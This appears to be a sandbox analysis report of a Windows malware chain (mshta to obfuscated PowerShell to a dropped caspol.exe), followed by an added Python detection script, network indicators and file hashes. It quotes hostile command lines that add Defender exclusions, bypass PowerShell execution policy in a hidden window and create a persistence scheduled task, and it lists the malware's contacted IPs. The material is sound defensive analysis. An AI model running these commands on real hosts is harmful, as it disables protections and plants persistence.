"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4E79.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
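The process trees of behavioral1 and behavioral2 are the same chain on two Windows versions: mshta.exe runs the .hta, a case-mangled PowerShell host decodes and runs stage 2 (spawning a hidden decoy powershell.exe on the way), csc.exe/cvtres.exe compile an Add-Type helper in %TEMP%, the dropped caspol.exe is launched, it adds Defender exclusions for itself and a second name, registers a scheduled task from an XML file in %TEMP%, and then re-launches itself, which is the SetThreadContext/hollowing step the signatures flag. Below is an added detection pass over that chain, written for this page and not taken from the report or from any product. The command lines are copied from behavioral1; the parent/child links are an assumption (the report lists processes flat) chosen to match the launch order shown, and the thresholds and ATT&CK labels are mine.

```python
"""Detection rules run over the process chain reported above.

Added example, not part of the sandbox report. Command lines are copied from
the behavioral1 tree; parent links are an ASSUMPTION (the report lists
processes flat) that follows the launch order shown on the page.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    image: str      # image path as recorded by the sandbox (SysWOW64 = 32-bit host)
    cmdline: str    # command line as recorded
    parent: str     # parent image path (assumed for this example)


PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS32_MANGLED = r"C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe"
MSHTA = r"C:\Windows\SysWOW64\mshta.exe"
CASPOL = r"C:\Users\Admin\AppData\Roaming\caspol.exe"
HTA = r"C:\Users\Admin\AppData\Local\Temp\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta"

SAMPLE_TREE = [
    Proc(MSHTA, f'{MSHTA} "{HTA}"', r"C:\Windows\explorer.exe"),
    Proc(PS32_MANGLED,   # stage-2 chain truncated here; see the full line above
         r'"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" '
         r'"PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx(<stage-2 chain>)"',
         MSHTA),
    Proc(PS32, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 '
               r'-c DeViCecReDenTIaldEpLOyment', PS32_MANGLED),
    Proc(r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
         r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths '
         r'@"C:\Users\Admin\AppData\Local\Temp\yygz-_yf.cmdline"', PS32),
    Proc(CASPOL, f'"{CASPOL}"', PS32),
    Proc(PS32, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
               r'-ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"', CASPOL),
    Proc(r"C:\Windows\SysWOW64\schtasks.exe",
         r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" '
         r'/XML "C:\Users\Admin\AppData\Local\Temp\tmp5B69.tmp"', CASPOL),
    Proc(CASPOL, f'"{CASPOL}"', CASPOL),   # self-spawn: "PID 2844 set thread context of 2216"
]

LOLBINS = {"powershell.exe", "mshta.exe", "schtasks.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "rundll32.exe", "regsvr32.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"')


def first_token(cmdline):
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def case_mangled_lolbin(p, min_flips=3):
    """Known binary name whose letter case deviates from canonical in >= min_flips places.
    Threshold is a tunable heuristic: 'PowerShell.exe' (2 flips) is left alone."""
    name = basename(first_token(p.cmdline))
    canon = name.lower()
    return canon in LOLBINS and sum(a != b for a, b in zip(name, canon)) >= min_flips


def ps_hidden_bypass(p):
    """powershell.exe with -ExecutionPolicy Bypass and a hidden window (abbreviations included)."""
    if basename(p.image).lower() != "powershell.exe":
        return False
    c = p.cmdline.lower()
    return bool(re.search(r"-ex\w*\s+bypass", c)) and bool(re.search(r"-w\w*\s+(?:1|hidden)\b", c))


def defender_exclusion(p):
    return re.search(r"add-mppreference\b.*-exclusion(?:path|process|extension|ipaddress)",
                     p.cmdline, re.IGNORECASE) is not None


def schtasks_xml_from_temp(p):
    c = p.cmdline.lower()
    return (basename(p.image).lower() == "schtasks.exe" and "/create" in c
            and re.search(r'/xml\s+"?[^"\s]*\\appdata\\local\\temp\\', c) is not None)


def inline_compile_from_powershell(p):
    return basename(p.image).lower() == "csc.exe" and basename(p.parent).lower() == "powershell.exe"


def self_spawn_from_userdir(p):
    return p.image.lower() == p.parent.lower() and "\\appdata\\" in p.image.lower()


def mshta_to_powershell(p):
    return basename(p.parent).lower() == "mshta.exe" and basename(p.image).lower() == "powershell.exe"


RULES = {
    "T1218.005 mshta spawns PowerShell": mshta_to_powershell,
    "T1059.001 PowerShell hidden + ExecutionPolicy bypass": ps_hidden_bypass,
    "T1036 case-mangled LOLBin name": case_mangled_lolbin,
    "T1027.004 compile after delivery (csc.exe under PowerShell)": inline_compile_from_powershell,
    "T1562.001 Defender exclusion added": defender_exclusion,
    "T1053.005 scheduled task from XML in %TEMP%": schtasks_xml_from_temp,
    "T1055 self-spawn from AppData (hollowing candidate)": self_spawn_from_userdir,
}


def run_rules(tree):
    """Return (rule name, image basename) for every rule that fires on every process."""
    return [(name, basename(p.image)) for p in tree for name, rule in RULES.items() if rule(p)]


if __name__ == "__main__":
    for hit in run_rules(SAMPLE_TREE):
        print(hit)
```

Two of these rules depend on parent/child links that the report does not state, so on real telemetry feed them Sysmon event 1 or EDR process-start records that carry ParentImage. Note also that Add-MpPreference only succeeds from an elevated PowerShell; if the user is not an administrator the exclusion is never written, but the attempt itself is still a high-fidelity signal, and on a host where it did succeed the exclusion persists after caspol.exe is removed, so remediation has to clear it explicitly along with the Updates\rrwscqkDSNwLK task.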
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 192.3.243.136:80 | 192.3.243.136 | tcp |
| US | 8.8.8.8:53 | 136.243.3.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| US | 8.8.8.8:53 | 41.177.156.94.in-addr.arpa | udp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| US | 8.8.8.8:53 | 22.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
Files
memory/4064-0-0x000000007070E000-0x000000007070F000-memory.dmp
memory/4064-1-0x0000000004520000-0x0000000004556000-memory.dmp
memory/4064-2-0x0000000004D20000-0x0000000005348000-memory.dmp
memory/4064-3-0x0000000070700000-0x0000000070EB0000-memory.dmp
memory/4064-4-0x0000000070700000-0x0000000070EB0000-memory.dmp
memory/4064-5-0x0000000004C40000-0x0000000004C62000-memory.dmp
memory/4064-6-0x0000000005440000-0x00000000054A6000-memory.dmp
memory/4064-7-0x00000000054B0000-0x0000000005516000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pcurmcxv.of4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4064-17-0x0000000005520000-0x0000000005874000-memory.dmp
memory/4064-18-0x0000000005B00000-0x0000000005B1E000-memory.dmp
memory/4064-19-0x0000000005B30000-0x0000000005B7C000-memory.dmp
memory/4672-29-0x0000000006EF0000-0x0000000006F22000-memory.dmp
memory/4672-30-0x000000006CFC0000-0x000000006D00C000-memory.dmp
memory/4672-40-0x0000000006300000-0x000000000631E000-memory.dmp
memory/4672-41-0x0000000006F30000-0x0000000006FD3000-memory.dmp
memory/4672-42-0x00000000076B0000-0x0000000007D2A000-memory.dmp
memory/4672-43-0x0000000007060000-0x000000000707A000-memory.dmp
memory/4672-44-0x00000000070C0000-0x00000000070CA000-memory.dmp
memory/4672-45-0x00000000072F0000-0x0000000007386000-memory.dmp
memory/4672-46-0x0000000007260000-0x0000000007271000-memory.dmp
memory/4672-47-0x0000000007290000-0x000000000729E000-memory.dmp
memory/4672-48-0x00000000072A0000-0x00000000072B4000-memory.dmp
memory/4672-49-0x00000000073B0000-0x00000000073CA000-memory.dmp
memory/4672-50-0x00000000072E0000-0x00000000072E8000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\5jeux4ci\5jeux4ci.cmdline
| MD5 | 8c9b7ff1a72ad5387d3f27fe085a93a7 |
| SHA1 | 593b1e1dd89eebe43407175401d80f1ba30537a1 |
| SHA256 | b778e917038d306ed064959f34d972da79c849d3057db4f8094fb6092fc51b10 |
| SHA512 | 53185cca2dadc75985423cb568d996489860531ab0acf3b90a607cb0874ba59e0928402a062ad239f7362a7481a578ffa4032463bfc5078544f649e13d73b4bd |
\??\c:\Users\Admin\AppData\Local\Temp\5jeux4ci\5jeux4ci.0.cs
| MD5 | fe82050659a8b97690d60529499222c1 |
| SHA1 | 7cc50135852b46dd1e36f2ff98506613db525a68 |
| SHA256 | 64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a |
| SHA512 | 59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f |
\??\c:\Users\Admin\AppData\Local\Temp\5jeux4ci\CSC8265DFDF4E4A4F1DACE6C6829FB3C9F8.TMP
| MD5 | 091690bba9ad6c5821e3a1bee115630f |
| SHA1 | d400de84e80751b7e40760030efdd9ee67b3b60e |
| SHA256 | 81f8f0222fdb5722451c7796f1af8b306bda81d7bd796edc15a85968fad7cada |
| SHA512 | e5499895904c43bfb9bfa80a93a751d806704b099667f1dd6d9f8c16398d77425006d30c150952fb4e16f2d81071080fc1d6782e02b64481ebdb3e0179b402eb |
C:\Users\Admin\AppData\Local\Temp\RESDAB0.tmp
| MD5 | 6c778c10cd9806dc88b5a362b7dbaf08 |
| SHA1 | b75e7b22df0c281abc3a3446fb2e47c74c2e9234 |
| SHA256 | 181fe92b953876aca806f6e46991beb6251c8341032a02809a320814172fc72e |
| SHA512 | 35e89ea42b155a693ff27a59c7b5a6cb4dd2f6617ff8de740e41cc8866acff2e9aa7fb4f8f4a56df09808405b3919c221a474d91641018cb95c6d7a8974ae239 |
C:\Users\Admin\AppData\Local\Temp\5jeux4ci\5jeux4ci.dll
| MD5 | 9579c39867cc3a948b9672f2f299ec7e |
| SHA1 | b2ac3e3905fa66377ad8dcf752a689514d1074f2 |
| SHA256 | 1faa2da995ad3858c5318c519b9ef1bcc29487cbbf82e13e6d119d3f2ae0f726 |
| SHA512 | 3498aa35dd1c8d7ea6a52c26183f6c992ab63e6d24b9eeaaf2d59e90aa04e3bf30d999252e745b4eba1b713412edce63da4503b68e7139d4ea30a14ec5d2c8a8 |
memory/4064-65-0x00000000060C0000-0x00000000060C8000-memory.dmp
memory/4064-67-0x000000007070E000-0x000000007070F000-memory.dmp
memory/4064-72-0x0000000070700000-0x0000000070EB0000-memory.dmp
memory/4064-73-0x0000000070700000-0x0000000070EB0000-memory.dmp
C:\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 74061922f1e78c237a66d12a15a18181 |
| SHA1 | e31ee444aaa552a100f006e43f0810497a3b0387 |
| SHA256 | 89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c |
| SHA512 | 306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOweRShelL.EXe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 85c8839aeeb7ec3d26c6eda556b54b41 |
| SHA1 | a6fd28cdf822b5886909e3159f03826b39573b22 |
| SHA256 | 39ccaad6c32ae17c090e33b8f04f4d931d868184b5db284208e0d7def0b14702 |
| SHA512 | da91140869e6d7ebf07e7b7c58188b279105397d5ff6f715d5a2986edc5754024bf154e989194b41e4bdf2c2deb77e4c001ea869c9b10fc9a83c5e96f706a68b |
memory/1736-82-0x0000000000AC0000-0x0000000000B58000-memory.dmp
memory/4064-83-0x0000000070700000-0x0000000070EB0000-memory.dmp
memory/1736-84-0x0000000005930000-0x0000000005ED4000-memory.dmp
memory/1736-85-0x0000000005420000-0x00000000054B2000-memory.dmp
memory/1736-86-0x00000000055B0000-0x00000000055BA000-memory.dmp
memory/1736-87-0x00000000056C0000-0x000000000575C000-memory.dmp
memory/1736-88-0x0000000005690000-0x00000000056A2000-memory.dmp
memory/1736-89-0x0000000006D90000-0x0000000006DF4000-memory.dmp
memory/320-94-0x0000000005D80000-0x00000000060D4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp4E79.tmp
| MD5 | 53a4d49bd03963beb41dfb68ac4dc24e |
| SHA1 | 80b6acff7c57e0a48d4751516ccedb5fd831f922 |
| SHA256 | 2c9eb72413dd90a7a15d0275ca8930e76fede3a8d3340ba834bd7571b862aa48 |
| SHA512 | 9d1a16e3cabc2cd51745b78fa7899c695c0c88b3254a9cdc0985efe3da21f86c6d480636bbd0071f850c3162786f5e65a01b68d4398629c3ce4c425cf2eeef05 |
memory/2744-120-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2744-116-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/320-122-0x0000000006970000-0x00000000069BC000-memory.dmp
memory/320-123-0x000000006D5A0000-0x000000006D5EC000-memory.dmp
memory/320-133-0x00000000075F0000-0x0000000007693000-memory.dmp
memory/1532-137-0x000000006D5A0000-0x000000006D5EC000-memory.dmp
memory/320-147-0x0000000007950000-0x0000000007961000-memory.dmp
memory/320-157-0x0000000007990000-0x00000000079A4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | edc4145054dc88b6cd901d5e677eb7a4 |
| SHA1 | f3d163b1f7a6c3960320b549c9bd62f1cd283f54 |
| SHA256 | 5a8fa8f8f4b330ca08e906e7e501af32d4f2125c8f93a1509e710d0be0bfbcb9 |
| SHA512 | 3525dc70ada2e5b9ad2b5af60a06cac4c32d08f457cd304a6f585e99912936a501bd4dcc4179b8fa3a2a8da61ab3f7a82153aa055bf2832d89a89b4d0fbad314 |
memory/2744-167-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2744-175-0x0000000000400000-0x00000000004A2000-memory.dmp